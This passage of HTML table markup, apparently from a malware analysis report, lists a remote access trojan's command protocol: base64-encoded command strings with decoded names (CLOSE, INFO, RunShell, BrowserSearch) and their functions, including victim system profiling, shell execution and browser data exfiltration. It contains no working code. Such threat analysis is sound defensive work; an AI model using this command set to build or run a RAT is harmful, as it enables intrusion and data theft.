Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1675936935" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{128}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">PING!</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="466857764" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{135}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Heartbeat request</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="980466928" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{143}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Q0xPU0U=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1112410224" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{150}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">CLOSE</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1726760127" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{157}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Terminate<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">RAT process</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="5" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="790968210" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{167}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">SU5GTw==</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="623138982" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{174}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">INFO</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1739590389" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{181}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">collects OS edition, architecture, and hardware details from the victim machine</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="6" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1061882132" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{189}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">UnVuU2hlbGw=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1875573313" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{196}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">RunShell</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1726274946" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{203}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Execute shell command</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="7" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="2425548" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{211}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">QnJvd3NlclNlYXJjaA==</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1666104425" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{218}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">BrowserSearch</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1549215773" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{225}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Browser data<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">exfiltration</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="8" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="133218572" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{235}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; 